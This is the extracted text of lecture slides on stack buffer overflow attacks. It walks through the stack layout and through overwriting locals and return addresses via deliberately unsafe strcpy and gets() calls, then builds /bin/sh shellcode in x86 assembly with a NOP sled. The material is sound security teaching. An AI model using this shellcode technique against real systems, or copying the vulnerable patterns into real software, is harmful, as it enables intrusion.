Buffer Overflow Attacks 1 Basic Idea Sample Attacks Protection , Computer & Network Security
History 2 Basic Idea Sample Attacks Protection , Computer & Network Security 1960s1970s1990sToday1980s Vulnerability exploited on time-share machines Attacks on early networked machines Morris Worm uses buffer overflow in taking down significant portion of the Internet Buffer overflow attacks become (arguably) the most pressing security concerns facing the web (e..g., in 1998, 2/3 of CERT advisories were buffer overflow related) The problem persists (e.g., IE VML advisory from two months ago).
Memory Layout 3 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses
Memory Layout 4 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); }
Memory Layout 5 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp
Memory Layout 6 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp
Memory Layout 7 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2
Memory Layout 8 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1
Memory Layout 9 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret
Memory Layout 10 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp
Memory Layout 11 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp
Memory Layout 12 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp
Memory Layout 13 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp buffer
Memory Layout 14 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp buffer
Memory Layout 15 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp bigstr
Sample Attacks 16 Basic Idea Sample Attacks Protection , Computer & Network Security Modify local variables Modify return address to skip/repeat code Modify return address to run evil code
Modify Local Variables 17 Basic Idea Sample Attacks Protection , Computer & Network Security Modify local variables Modify return address to skip/repeat code Modify return address to run evil code
Modify Local Variables 18 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … }
Modify Local Variables 19 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } ret sfp query subject[] recp[]
Modify Local Variables 20 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } ret sfp query subject[] recp[]
Modify Local Variables 21 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } ret sfp subject[] recp[] query
Modify Local Variables 22 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } ret sfp subject[] recp[] query Demo…
Repeat Code… 23 Basic Idea Sample Attacks Protection , Computer & Network Security Modify local variables Modify return address to skip/repeat code Modify return address to run evil code
Repeat Code… 24 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); }
Repeat Code… 25 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); }
Repeat Code… 26 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } addr
Repeat Code… 27 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } buffer
Repeat Code… 28 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } addr
Repeat Code… 29 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } addr Demo…
Sample Attacks 30 Basic Idea Sample Attacks Protection , Computer & Network Security Modify local variables Modify return address to skip/repeat code Modify return address to run evil code
Running Evil Code… 31 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 ret sfp buffer void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … }
Running Evil Code… 32 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb
Running Evil Code… 33 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb
Running Evil Code… 34 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb
Running Evil Code… 35 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb
Running Evil Code… 36 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb ????
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 37 Basic Idea Sample Attacks Protection , Computer & Network Security
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 38 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 39 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 40 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 “/bin/sh”
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 41 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 42 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc name
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 43 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0xfffffff8 0x80884a8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 44 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0x80884a8 0xfffffff8 ret sfp fp (ebp)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 45 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx 0x80884a8 0xfffffff8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 46 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx 0x80884a8 0xfffffff8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 47 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 48 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 49 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8
Running Evil Code… 50 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp fp (ebp) movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
Running Evil Code… 51 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp fp (ebp) movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 string_addr NULL ecx ebx edx 0x8
Running Evil Code… 52 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 string_addr NULL ??????
Running Evil Code… 53 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
Running Evil Code… 54 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code
Running Evil Code… 55 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code
Running Evil Code… 56 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code addr of “bin/sh”
Running Evil Code… 57 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code addr of “bin/sh” esi
Running Evil Code… 58 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code
Running Evil Code… 59 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #1: Zero Bytes
Running Evil Code… 60 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #1: Zero Bytes Solution: Generate on the fly (e.g., push $0x0 = xor %eax, %eax push %eax )
Running Evil Code… 61 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address code ret’ ret’ ret’
Running Evil Code… 62 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address code ret’ ret’ ret’
Running Evil Code… 63 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address code ret’ ret’ ret’
Running Evil Code… 64 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop
Running Evil Code… 65 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop
Running Evil Code… 66 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop
Running Evil Code… 67 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop